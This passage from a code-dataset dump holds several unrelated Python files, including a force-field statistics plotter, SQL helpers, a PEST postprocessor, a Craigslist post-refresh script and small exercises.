\"ProperTorsions\"] ):\n delta = 2*kT/(force_k * (np.pi/180)**2 )**.5\n if(print_header):\n fid.write(\"# {:3s} {:24s} \\n\".format(label, smirks))\n fid.write(\"# r0 = {:6.2f}, k = {:6.2f} kT-> {:6.2f}\\n\".format(r0, force_k, delta))\n fid.write(\"#{:4s} {:5s} {:4s} {:60s} {:10s} {:10s} {:10s} {:10s} {:10s}\\n\".format(\"idx\", \"count\", \"flag\", \"category\", \"ffRMS(L)\", \"ffRMS(E)\", \"measL\", \"measRMS(L)\", \"measRMS(E)\"))\n\n if(measure in [\"Angles\", \"ImproperTorsions\", \"ProperTorsions\"] ):\n force_k = force_k * (np.pi/180)**2 # put into degrees\n\n #num *= np.pi/180\n #print([(smiles, mdatamean[smiles]) for smiles in smiles_hits])\n dat = []\n outstr = []\n per_term_flag = \"G\"\n 
flag = \"G\"\n bond_indices = []\n valence_term = {}\n for idx,smiles in zip(smiles_idx,smiles_hits):\n for index_key, index_dat in m[\"mol_data\"][smiles][measure][\"indices\"].items():\n if(index_dat['oFF'] == label):\n bond_indices.append(index_key)\n valence_term[index_key] = []\n for index_key in valence_term:\n single_terms = []\n index_count = 0\n for idx,smiles in zip(smiles_idx,smiles_hits):\n try:\n col_idx = m[\"mol_data\"][smiles][measure][\"indices\"][index_key][\"column_idx\"]\n except KeyError as e:\n logger.warning(\"\\n** Missing\" + str(e) + \": Probably different molecules with same smiles. Check the output! ** \")\n continue\n vals = np.atleast_1d(m[\"mol_data\"][smiles][measure][\"values\"][:,col_idx])\n valence_term[index_key] = np.append(valence_term[index_key], vals)\n flag = \"G\"\n if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()):\n flag = \"R\"\n elif(vals.max() < r0 or vals.min() > r0):\n flag = \"Y\"\n avglen = vals.mean()\n rmslen = rms(vals - r0)\n rmsene = rms(force_k/2 * (vals - r0)**2)\n mrmslen = rms(vals - avglen)\n mrmsene = rms(force_k/2 * (vals - avglen)**2)\n single_terms.append((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj,len(vals), flag,\"--->conformation \"+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene))\n if(vals.size > 1):\n for kk,val in enumerate(vals):\n flag = \"G\"\n if((val < (r0 - delta)) or (val > (r0 + delta))):\n flag = \"R\"\n elif(val < r0 or val > r0):\n flag = \"X\"\n avglen = val\n rmslen = rms(val - r0)\n rmsene = rms(force_k/2 * (val - r0)**2)\n mrmslen = rms(val - avglen)\n mrmsene = rms(force_k/2 * (val - avglen)**2)\n single_terms.append((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj,1, flag,\".....>intermediate \"+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene))\n index_count += len(vals)\n avglen = valence_term[index_key].mean()\n rmslen = rms(valence_term[index_key] - r0)\n rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2)\n mrmslen = rms(valence_term[index_key] - avglen)\n mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2)\n\n flag = \"G\"\n if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()):\n flag = \"R\"\n elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0):\n flag = \"Y\"\n outstr.append((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj, index_count, flag,\"==>atoms \" + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene))\n [outstr.append(term) for term in single_terms]\n dat = np.append(dat, valence_term[index_key])\n \n #if(measure == \"Angles\"):\n # pass\n #dat *= np.pi/180\n\n mol_label_count += len(dat)\n if(len(dat) > 0):\n flag = \"G\"\n if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()):\n flag = \"R\"\n elif(dat.max() < r0 or dat.min() > r0):\n flag = \"Y\"\n avglen = dat.mean()\n rmslen = rms(dat - r0)\n rmsene = rms(force_k/2 * (dat - r0)**2)\n mrmslen = rms(dat - avglen)\n mrmsene = rms(force_k/2 * (dat - avglen)**2)\n\n fid.write((\" {:4d} {:5d} {:>4s} {:60s} \" + rms_str + \"\\n\").format(jj,mol_label_count, flag,\"|>molecule \" + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) \n [fid.write(s) for s in outstr]\n print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=\" \")\n fragstr = \"all\"\n\n\n\n\n\n# ene_str=\"{:s}: meanE= {:9.4f} RMS(E)= {:9.4} maxAngEne= {:9.4f} {:9.4f}\"\n# ene_maxdel_str=\"DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} 
maxGapAngEne {:9.4f} {:9.4f}\"\n# ref_ene_key = 'qm'\n# \n if len(params[\"Energy\"]) > 1:\n with open(ene_out_fname, 'a') as fid:\n measure = \"Energy\"\n mol_label_count = 0\n ref_ene = np.array(mdata[ref_ene_key])\n logger.debug(\"VAR: ref_ene= \" + str(ref_ene))\n ref_ene_max_idx = ref_ene.argmax()\n td_ang = m[\"td_ang\"][m[\"mol_data\"][smiles][\"td_ang\"]]\n if(td_ang[0] == None):\n continue\n fid.write((\" {:4d} {:5d} {:>4s} {:60s} \" + ene_str + \"\\n\").format(jj,len(ref_ene), \"REF\",\"|>molecule \" + strip_conformation_number(smiles),ref_ene_key, ref_ene.mean(), rms(ref_ene - ref_ene.mean()), td_ang[ref_ene_max_idx], ref_ene[ref_ene_max_idx])) \n ene_list = {x:y for x,y in params[\"Energy\"].items() if x != \"qm\"}\n for ene_group in ene_list:\n for ene_type in ene_list[ene_group]:\n label = \".\".join((ene_group, ene_type))\n ene = np.array(mdata[label])\n ene_max_idx = ene.argmax()\n delta = ene - ref_ene\n delta_max_idx = np.abs(delta).argmax()\n fid.write((\" {:4d} {:5d} {:>4s} {:60s} \" + ene_str + \" \" + ene_maxdel_str +\"\\n\").format(jj,len(ene), \"\",\"==> \" + label, \"\", ene.mean(), rms(ene - ene.mean()), td_ang[ene_max_idx], ene[ene_max_idx], ene.mean() - ref_ene.mean(), td_ang[ene_max_idx] - td_ang[ref_ene_max_idx], ene[ene_max_idx] - ref_ene[ref_ene_max_idx], td_ang[delta_max_idx], delta[delta_max_idx])) \n\n\n # need argmax of ref for angle and ene \n # need mean angle\n # for label in params[measure]:\n # if((\"qm\" not in label) or (\"oFF\" not in label)):\n # continue\n # label_count = 0\n # #r0 = float(str(bond_r0[label]).split()[0])\n # \n # #delta *= 180/np.pi\n # #pass\n # if(print_header):\n # fid.write(\"#{:4s} {:5s} {:4s} {:50s} {:10s} {:10s} {:10s} {:10s} {:10s}\\n\".format(\"idx\", \"count\", \"flag\", \"category\", \"ffRMS(L)\", \"ffRMS(E)\", \"measL\", \"measRMS(L)\", \"measRMS(E)\"))\n # \n # #need argmax of angle and ene\n # # need argmax of different between data and ref\n #\n # # have a reference ene (the qm)\n # dat = []\n # outstr = []\n # per_term_flag = \"X\"\n # flag = \"X\"\n # bond_indices = []\n # valence_term = {}\n #\n #\n # single_terms = []\n # index_count = 0\n # for idx,smiles in zip(smiles_idx,smiles_hits):\n # try:\n # col_idx = m[\"mol_data\"][smiles][measure][\"indices\"][index_key][\"column_idx\"]\n # except KeyError as e:\n # logger.warning(\"\\n** Missing\" + str(e) + \": Probably different molecules with same smiles. Check the output! 
** \")\n # continue\n # vals = np.atleast_1d(m[\"mol_data\"][smiles][measure][\"values\"][:,col_idx])\n # valence_term[index_key] = np.append(valence_term[index_key], vals)\n # flag = \"G\"\n # if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()):\n # flag = \"R\"\n # elif(vals.max() < r0 or vals.min() > r0):\n # flag = \"Y\"\n # avglen = vals.mean()\n # rmslen = rms(vals - r0)\n # rmsene = rms(force_k/2 * (vals - r0)**2)\n # mrmslen = rms(vals - avglen)\n # mrmsene = rms(force_k/2 * (vals - avglen)**2)\n # single_terms.append((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj,len(vals), flag,\"--->conformation \"+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene))\n # if(vals.size > 1):\n # for kk,val in enumerate(vals):\n # flag = \"G\"\n # if((val < (r0 - delta)) or (val > (r0 + delta))):\n # flag = \"R\"\n # elif(val < r0 or val > r0):\n # flag = \"X\"\n # avglen = val\n # rmslen = rms(val - r0)\n # rmsene = rms(force_k/2 * (val - r0)**2)\n # mrmslen = rms(val - avglen)\n # mrmsene = rms(force_k/2 * (val - avglen)**2)\n # single_terms.append((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj,1, flag,\".....>intermediate \"+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene))\n # index_count += len(vals)\n # avglen = valence_term[index_key].mean()\n # rmslen = rms(valence_term[index_key] - r0)\n # rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2)\n # mrmslen = rms(valence_term[index_key] - avglen)\n # mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2)\n #\n # flag = \"G\"\n # if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()):\n # flag = \"R\"\n # elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0):\n # flag = \"Y\"\n # outstr.append((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj, index_count, flag,\"==>atoms \" + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene))\n # [outstr.append(term) for term in single_terms]\n # dat = np.append(dat, valence_term[index_key])\n # \n # #if(measure == \"Angles\"):\n # # pass\n # #dat *= np.pi/180\n #\n # mol_label_count += len(dat)\n # if(len(dat) > 0):\n # flag = \"G\"\n # if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()):\n # flag = \"R\"\n # elif(dat.max() < r0 or dat.min() > r0):\n # flag = \"Y\"\n # avglen = dat.mean()\n # rmslen = rms(dat - r0)\n # rmsene = rms(force_k/2 * (dat - r0)**2)\n # mrmslen = rms(dat - avglen)\n # mrmsene = rms(force_k/2 * (dat - avglen)**2)\n #\n # fid.write((\" {:4d} {:5d} {:>4s} {:50s} \" + rms_str + \"\\n\").format(jj,mol_label_count, flag,\"|>molecule \" + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) \n # [fid.write(s) for s in outstr]\n # print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=\" \")\n\n\n\n\n if(\"fragment\" in m):\n fragstr = m[\"fragment\"]\n fig.suptitle((\"frag={:s} \" + \"{:s}\").format(fragstr,smiles))\n\n fig.savefig(\"fig.mol_\" + str(index[smiles]) + \".\" + param_str +\"png\")\n plt.close(fig)\n print()\n","sub_path":"offsb/dev/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":34257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394511424","text":"from bot.Indicators import AddIndicator\n\nclass AlwaysBuyStrategy:\n\t\"\"\" Always Buy Strategy:\n\tBuys when low < close and sells when close > low\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\" \"\"\"\n\t\tself.minimum_period 
= 5\n\t\n\tdef setup(self, df):\n\t\tself.df = df\n\n\tdef getIndicators(self):\n\t\treturn []\n\n\tdef checkBuySignal(self, i):\n\t\tdf = self.df\n\t\tif df[\"low\"][i] < df[\"close\"][i]:\n\t\t\treturn True\n\t\n\t\treturn False\n\t\t\n\tdef checkSellSignal(self, i):\n\t\tdf = self.df\n\t\tif df[\"close\"][i] > df[\"low\"][i]:\n\t\t\treturn True\n\t\n\t\treturn False\n\n\tdef getBuySignalsList(self):\n\t\tdf = self.df\n\t\tlength = len(df) - 1\n\t\tsignals = []\n\t\tfor i in range(1, length):\n\t\t\tres = self.checkBuySignal(i)\n\t\t\tif res:\n\t\t\t\tsignals.append([df['time'][i], df['close'][i]])\n\n\t\treturn signals\n\n\tdef getSellSignalsList(self):\n\t\tdf = self.df\n\t\tlength = len(df) - 1\n\t\tsignals = []\n\t\tfor i in range(1, length):\n\t\t\tres = self.checkSellSignal(i)\n\t\t\tif res:\n\t\t\t\tsignals.append([df['time'][i], df['close'][i]])\n\n\t\treturn signals","sub_path":"bot/Strategies/AlwaysBuyStrategy.py","file_name":"AlwaysBuyStrategy.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590434522","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurrences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\ndef count_th(word):\n \n #base case - word is too short\n if len(word) < 2:\n return 0\n #recursion\n else:\n # if first two characters are 'th'\n if word[:2] == 'th':\n return 1 + count_th(word[2:])\n # move over one character in the word\n # pass the shortened word back into the function until it is shorter than 2 characters\n else:\n return count_th(word[1:])\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574844135","text":"#!/usr/bin/env python3\n# -*-coding:utf-8-*-\n\"\"\"Copyright: Copyright (c) 2018 Asiainfo\n @Description: ***Basic Oracle database operations***\n @fileName: ora_sql_exec.py\n @version: v1.0.0\n @author: mazhe\n @created on: 2018/11/19 11:57 AM 17:29\n\"\"\"\n\n\ndef sql_dml(sql, db):\n \"\"\"\n @Function: sql_dml\n @Description: data insert/update/delete (DML) operations\n @param: sql -- DML statement to execute, db -- Oracle connection\n @return: DML row counts\n \"\"\"\n cursor = db.cursor()\n cursor.execute(sql)\n # fetch the number of affected rows\n # effect_num = cursor.getarraydmlrowcounts()\n db.commit()\n cursor.close()\n # return effect_num\n\n\ndef many_insert(table_name, values, db):\n \"\"\"\n :param table_name: target table for the insert\n :param values: rows to insert, as a list\n :param db: database connection\n :return: None\n \"\"\"\n if len(values) > 0:\n cursor = db.cursor()\n param = list()\n # build the bind-variable string from the number of columns in the data\n for i in range(0, len(values[0])):\n str_append = \":\" + str(i + 1)\n param.append(str_append)\n bind_str = \",\".join(param)\n sql = \"insert into {0} values ({1})\".format(table_name, bind_str)\n cursor.prepare(sql)\n cursor.executemany(None, values)\n db.commit()\n cursor.close()\n\n\ndef sql_select(sql, db):\n \"\"\"\n @Function: sql_select\n @Description: query SQL results over the given database connection\n @param: sql -- query SQL, db -- Oracle connection\n @return: all rows matching the SQL\n \"\"\"\n cursor = db.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n cursor.close()\n return result\n","sub_path":"monitor_file_amount_change/ora_sql_exec.py","file_name":"ora_sql_exec.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"598574238","text":"a = input(\"Enter a number: \")\nb = input (\"Enter another number: \")\n\na= int(a)\nb= int(b)\n\nif a == b:\n print (\"The numbers are equal!\")\nelif a < b:\n while a <= b:\n if a%2==0:\n print (str(a) + \" - \" + \"even\")\n else:\n print (str(a) + \" - \" + \"odd\")\n a = a + 1\n\nelif a > b:\n while b <= a:\n if b%2 == 0:\n print (str(b) + \" - \" + \"even\")\n \n else:\n print (str(b) + \" - \" + \"odd\")\n b = b + 1\n\n\n","sub_path":"Programming0-1/week1/4-While-Loop_Problems/even_odd_interval.py","file_name":"even_odd_interval.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117447476","text":"import math, re, pandas as pd\n\n# takes float and returs a string in fortran 24.16E+00 notation\ndef f_format(x):\n if x > 0:\n myexp = 10**math.ceil(math.log10(x))\n x_str = '{0:>20.16f}E+{1:02}'.format(x/ myexp, int(math.log10(myexp)))\n if x == 0:\n x_str = ' 0.0000000000000000E+00'\n if x < 0:\n x = abs(x)\n myexp = 10**math.ceil(math.log10(x))\n x_str = '{0:>20.16f}E+{1:02}'.format(-1*x/ myexp, int(math.log10(myexp)))\n return x_str\n\n# make string in format of a row from the Hydraulics Summary\ndef l_hydsum(r):\n l = ''.join([f_format(x) for x in r])\n return l\n\n# read output file and return contents\n# as a string list with rows the lines of the output files\ndef getoutfile(str_file):\n with open(str_file) as f:\n #str_out = f.readlines()\n str_out = f.read().splitlines()\n #str_out = [re.sub('\\\\n$', '', x) for x in str_out]\n return str_out\n\n# gets the rows in the file that are the readers for the output tables\ndef getrows(str_out):\n row_index = [x for x in range(len(str_out)) if '**' in str_out[x]]\n zip(row_index[:-1], [row_index[1:], len(str_out)])\n return row_index\n\n# given the rows of table headers and the content of the out file\n# returns the names of the tables\ndef gettablenames(str_out, rows):\n ts = [str_out[x] for x in rows]\n tx = [re.sub('^( ){1,}|( ){1,}$','',re.sub('(\\\\n){1,}','', re.sub('(\\*){1,}','', x))) for x in ts]\n return tx\n\n## extracts table from output and returns pandas data frame\n# function that breaks string int a list of chunk for a specific width\ndef chunkstring(string, length):\n return [string[0+i:length+i] for i in range(0, len(string), length)]\n\n# gets the column names from the output table\ndef getheader(str_out, str_tab, dict_info):\n rs = dict_info.get(str_tab)\n str_raw = str_out[rs[0]]\n str_list = chunkstring(str_raw, 24)\n header = [re.sub('^( ){1,}|( ){1,}$', '', x) for x in str_list]\n return header\n\n# get the units\ndef getunits(str_out, str_tab, dict_info):\n rs = dict_info.get(str_tab)\n str_raw = str_out[rs[0] + 1] # units are the line below the column names\n str_list = chunkstring(str_raw, 24)\n str_units = [re.sub('^( ){1,}|( ){1,}$', '', x) for x in str_list]\n return str_units\n\n# get the values from the output table\ndef extraxtvals(str_out, str_tab, dict_info):\n rs = dict_info.get(str_tab)\n r = 2 # row the values start at in table\n if 'Diel' in str_tab:\n r = 3 # there is an extra row above values for diel tables\n str_sub = str_out[(rs[0]+r):rs[1]]\n data_blk = makeblk(str_sub)\n return data_blk\n\n# takes row from output tables values and parses into list using\n# fixed length of columns\n# used in makeblk function\ndef get_row_fix(r, length):\n row_raw = chunkstring(r, length)\n rout = [re.sub('^( ){1,}|( ){1,}$','',x) for x in row_raw]\n return rout\n\n# makes a data 
block of values from output table\ndef makeblk(str_vals):\n data_blk = [get_row_fix(str_vals[x], 24) for x in range(len(str_vals))]\n return data_blk\n\n# makes a pandas data frame from a table in output\ndef makedf(str_out, str_tab, dict_info):\n col_names = getheader(str_out, str_tab, dict_info)\n units = getunits(str_out, str_tab, dict_info)\n data_blk = extraxtvals(str_out, str_tab, dict_info)\n df_raw = pd.DataFrame.from_records(data_blk,columns = col_names)\n df = df_raw.apply(pd.to_numeric, errors = 'ignore')\n return df\n\n# creates a dictionary fo table names as kets and the starting and\n# ending rows of each table\ndef makedicttable(tab_names, tab_rows, n_rows):\n tab_str = [x + 1 for x in tab_rows]\n tab_end = [x - 1 for x in tab_rows[1:]]\n tab_end.append(n_rows)\n dic_tab_names = dict(zip(tab_names, zip(tab_str, tab_end)))\n return dic_tab_names\n\n# aggregates time-series by the hour using min, mean, and max functions\ndef tsagg(df, wq_par):\n df['Hour'] = df['Time'].astype(int)\n df['Hour'] = df['Hour'].astype(str)\n df['Hour'] = df['Hour'].astype(int)\n agg_funcs = dict(Min='min', Ave='mean', Max='max')\n df_agg = df.groupby(['Reach', 'Hour'])[wq_par].agg(agg_funcs)\n df_agg.reset_index(inplace=True)\n return df_agg\n\n# reads the model.ins file to get the obs names, formart, and -1 for vals in a data frame\ndef get_modelin(fn):\n d = {} # dictionary containing the obs name and the boundaries in the line\n with open(fn) as f:\n next(f) # skip the first line because it's not necessary for this action\n for line in f:\n (key, val) = re.sub('(^.*\\[)|( .*$\\n)','', line).split(']') # mung the line and retirn ons name and boundaries\n d[key] = val\n df = pd.DataFrame(d.items(), columns=('Name','cols')) # make data frame from dictionary\n df['vals'] = -1.0 # add col for vals with defaults of -1.0\n df['cols'] = df['cols'].str.strip() # get rid of any whitespaces that could have snuck in\n return(df)\n\n## gets value from aggregated dataframe for the reach, hour, and stat of the cur obs name from df_ins\ndef get_value(cur, df_agg):\n val = float(df_agg[(df_agg['Reach'] == int(cur[-4:-2])) & (df_agg['Hour'] == int(cur[-2:]))][cur[-7:-4].title()])\n return(val)\n\n## prints number in E to width defined by column boundaries\ndef print_num(cols, num):\n out = '{:+.{prec}E}'.format(num, prec=cols[1] - cols[0] - 7)\n return(out)\n\n## takes row from df_ins and creates line for model.out file\n## input cur must be a row from df_ins data frame\ndef create_ln(cur):\n cols = list(map(int, str(cur['cols']).split(':')))\n num = cur['vals']\n name = str(cur['Name'])\n sps = cols[0] - len(name)\n ln = name + ''.ljust(sps, ' ') + print_num(cols, num)\n return(ln)\n\n","sub_path":"Postprocess_for_PEST/Postprocess_for_PEST.py","file_name":"Postprocess_for_PEST.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282067660","text":"import numpy as np\nimport matplotlib.pyplot as plt\nclass Loadrawdata_show_train():## Load data\n #read raw data from files\n def load(self,filename):\n fread = open(filename, 'r', encoding='utf8')\n freport = open(\"logs/report.txt\", \"a\", encoding=\"utf8\")\n fword = open('Raw_Data/words.txt', 'w', encoding='utf8')\n ftags = open('Raw_Data/tags.txt', 'w', encoding='utf8')\n fsentence = open('Raw_Data/sentences.txt', 'w', encoding='utf8')\n creating_sent = []\n self.words = []\n self.tags = []\n self.sentence = []\n len_word=0\n len_sentence=0\n t=()\n 
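# sentence-final punctuation: period, Arabic question mark, Arabic semicolon, exclamation mark\n 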
end_of_line=[\".\",\"؟\",\"؛\",\"!\"]\n for line in fread:\n if line=='\\n':\n pass\n else:\n line = line.replace(\"\\n\", \"\")\n line = line.replace(u'\\ufeff', \"\")\n line = line.replace(u'\\u200c', \"\")\n line = line.replace(u'\\u200e', \"\")\n line = line.replace(u'\\u200f\\\\', \"\")\n line = line.replace(u'\\u200f', \"\")\n data = line.split()\n self.words.append(data[0])\n len_word+=len(data[0])\n try:\n self.tags.append(data[1])\n except Exception as err:\n print(line)\n if data[0] not in end_of_line:\n #print(data)\n tuplex=(data[0],data[1])\n creating_sent.append(tuplex)\n else:\n tuplex = (data[0], data[1])\n creating_sent.append(tuplex)\n len_sentence+=len(creating_sent)\n self.sentence.append(creating_sent)\n creating_sent = []\n n_sentence=len(self.sentence)\n freport.write(\"all_word---------\" + str(len_word) + \"\\n\")\n freport.write(\"all_sentence---------\" + str(len_sentence) + \"\\n\")\n freport.write(\"n_sentence---------\" + str(n_sentence) + \"\\n\")\n self.unic_words = list(dict.fromkeys(self.words))\n self.uniq_tags=list(dict.fromkeys(self.tags))\n self.n_words=len(self.unic_words)\n fword.write(str(self.unic_words))\n self.n_tags=len(self.uniq_tags)\n ftags.write(str(self.uniq_tags))\n fsentence.write(str(self.sentence))\n print(\"len words are: \"+str(self.n_words))\n print(\"len tags are: \" + str(self.n_tags))\n #show histogram of sentences\n plt.hist([len(sen) for sen in self.sentence])\n plt.savefig('Raw_Data/hist.png')\n plt.show()\n\n\n return self.sentence,self.unic_words,self.uniq_tags,self.n_words,self.n_tags","sub_path":"Loadrawdata_show_2.py","file_name":"Loadrawdata_show_2.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360272820","text":"import os\nimport sys\n\nsys.path.append(os.path.join(sys.path[0],\"helpers\"))\n\nnats_server_address = os.environ['NATS_URL']\nnats_server_channel = os.environ['NATS_CLUSTER_NAME']\n\nfrom helpers.Nats import NatsService\n\ntry:\n print(\"starting nats service instance\")\n ns = NatsService(nats_server_address, nats_server_channel)\n print(\"listening for approved message\")\n ns.start_listening()\nexcept Exception as e:\n print(f\"Error: {e}\")\n\n","sub_path":"src/trends.py","file_name":"trends.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351136309","text":"from Node import Node\n\n\ndef kth_to_last_node(k, head):\n if k < 1:\n raise Exception(\"ValueError\")\n current_node = head\n length = 0\n while current_node:\n current_node = current_node.next\n length += 1\n if k > length:\n raise Exception(\"k is greater than linked list\")\n how_far = length - k\n print(how_far)\n current_node = head\n for _ in range(how_far):\n current_node = current_node.next\n print(current_node.value)\n\n\ndef kth_to_last_node_second_approach(k, head):\n if k < 1:\n raise Exception(\"ValueError\")\n right_node = head\n left_node = head\n for _ in range(k - 1):\n if not right_node.next:\n raise Exception(\"k is greater than linked list\")\n right_node = right_node.next\n while right_node.next:\n right_node = right_node.next\n left_node = left_node.next\n print(left_node.value)\n\n\na = Node(1)\nb = Node(2)\nc = Node(3)\nd = Node(4)\na.next = b\nb.next = c\nc.next = d\nkth_to_last_node(1, a)\nkth_to_last_node_second_approach(1, 
a)\n","sub_path":"KthNodeFromLast.py","file_name":"KthNodeFromLast.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"419142231","text":"from sqlalchemy import create_engine\nfrom sqlalchemy import Integer, String, MetaData, Table, Column, ForeignKey\nfrom sqlalchemy.sql import select\n\nengine = create_engine(\"mysql+pymysql://elko:elko@10.10.64.201/elko\", echo=True)\n\nmeta = MetaData()\nmeta.create_all(engine)\n\n\nparent = Table(\n 'parent',\n meta,\n Column('parent_id',Integer, primary_key=True),\n\n)\n\nchild = Table(\n 'child',\n meta,\n Column('child_id',Integer, primary_key=True),\n Column('parent_fk', Integer, ForeignKey('parent.parent_id') ),\n\n)\n\nmeta.create_all(engine)\n\n# insert parent+child\n\n# update child\n\n# delete parent\n\n\n# JOIN\njoin = parent.join(child, parent.c.parent_id == child.c.parent_fk)\n\nquery = select( [ parent, child.c.parent_fk ] ).select_from(join)\n\nconnection = engine.connect()\n\nrows = connection.execute(query)\n\nfor row in rows:\n print(row)\n","sub_path":"orm_foreign_key.py","file_name":"orm_foreign_key.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461927216","text":"import sys\n\nfrom clauth import login_to_account\nfrom wdtools import *\nfrom paths import *\n\n# bookshelf\nfrom reporter import Reporter\nfrom poster import Poster\nimport time\n\nfrom threading import Thread\n\nclass RefreshThread(Thread):\n def __init__(self, p, threadNo):\n Thread.__init__(self)\n self.postCollection = p\n self.threadNo = threadNo\n\n def run(self):\n p = Poster()\n p.refresh_collection(self.postCollection, threadNo=self.threadNo)\n\n\n# ===== RUN, FOREST, RUN! 
=====\ndef main(argv):\n datetime = time.localtime()\n months = { 1 : \"January\",\n 2 : \"February\",\n 3 : \"March\",\n 4 : \"April\",\n 5 : \"May\",\n 6 : \"June\",\n 7 : \"July\",\n 8 : \"August\",\n 9 : \"September\",\n 10 : \"October\",\n 11 : \"November\",\n 12 : \"December\"}\n\n tm_hour = datetime.tm_hour\n tm_min = datetime.tm_min\n tm_ampm = \"am\"\n if tm_hour > 12:\n tm_hour = tm_hour - 12\n tm_ampm = \"pm\"\n if tm_hour < 10:\n tm_hour = \"0\" + str(tm_hour)\n if tm_min < 10:\n tm_min = \"0\" + str(tm_min)\n tm_hour = str(tm_hour)\n tm_min = str(tm_min)\n\n\n print(\"Craigslist Refresh | \" + str(months[datetime.tm_mon]) + \" \"\n + str(datetime.tm_mday) + \", \" + str(datetime.tm_year) + \" | \"\n + tm_hour + \":\" + tm_min + \" \" + tm_ampm )\n\n\n postCollection = []\n threads = []\n\n print(\"Gathering postID data....\")\n pages = [1,2,3]\n numThreads = 3\n driver = login_to_account(\"http://www.google.com\")\n for pageNumber in pages:\n driver.get(urlPaths[\"url_AccountActive\"+str(pageNumber)])\n postCollection = postCollection + collect_post_ids(driver)\n print(\"Page \"+ str(pageNumber) + \\\n \" :: Collected \" + str(len(postCollection)) + \" posting IDs : \")\n\n print(\"Collected IDs :: \")\n print_posts(postCollection, printNumbers = True)\n driver.quit()\n\n postPartitions = partition_collection(postCollection, numThreads)\n for idx, part in enumerate(postPartitions):\n print(\"===============================================================\")\n print(\"Partition \" + str(idx) + \" :: size(\"+str(len(part))+\")\")\n print_posts(part)\n\n threads.append(RefreshThread(part, idx+1))\n print(\"=============================================================\")\n\n for t in threads:\n t.start()\n time.sleep(15)\n\n for t in threads:\n t.join()\n\n return 0\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"src/app_clrefreshthreaded.py","file_name":"app_clrefreshthreaded.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191628779","text":"import unittest\n\nimport numpy as np\n\nfrom mars.executor import Executor\nimport mars.tensor as mt\n\n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.executor = Executor('jax')\n\n def testUnaryExecution(self):\n executor_numpy = Executor('numpy')\n a = mt.ones((2, 2))\n a = a * (-1)\n c = mt.abs(a)\n d = mt.abs(c)\n e = mt.abs(d)\n f = mt.abs(e)\n result = self.executor.execute_tensor(f, concat=True)\n expected = executor_numpy.execute_tensor(f, concat=True)\n np.testing.assert_equal(result, expected)\n","sub_path":"mars/tensor/fuse/tests/test_jax_execute.py","file_name":"test_jax_execute.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611927740","text":"from queue import Queue\nimport unittest\n\nqueue = Queue(10)\nqueue1 = Queue(2)\nqueue2 = Queue(2)\n\nqueue2.put(2)\nqueue2.put(2)\n\nclass 